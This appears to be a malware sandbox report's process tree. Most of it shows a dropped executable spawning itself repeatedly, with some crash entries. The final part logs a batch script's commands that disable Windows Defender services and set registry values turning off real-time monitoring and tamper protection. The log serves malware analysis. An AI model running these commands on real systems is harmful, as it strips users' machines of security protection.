C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Enumerates connected drives
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12392 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
-
C:\Users\Admin\Documents\m21dPxSXvr2n3Za8XSXjPJgV.exe"C:\Users\Admin\Documents\m21dPxSXvr2n3Za8XSXjPJgV.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 340 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\7r8eheenr48ifSwYOruBNk3H.exe"C:\Users\Admin\Documents\7r8eheenr48ifSwYOruBNk3H.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\114ea3iZuW8lGHU596f7SwEr.exe"C:\Users\Admin\Documents\114ea3iZuW8lGHU596f7SwEr.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5QJ2f9SU.com"C:\Users\Admin\AppData\Local\Temp\5QJ2f9SU.com"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3307.tmp\3308.tmp\3309.bat C:\Users\Admin\AppData\Local\Temp\5QJ2f9SU.com"4⤵
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config Sense start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config WdNisDrv start=disabled5⤵
-
-
C:\Windows\system32\sc.exesc config WdNisSvc start=disabled5⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f5⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f5⤵
-
-
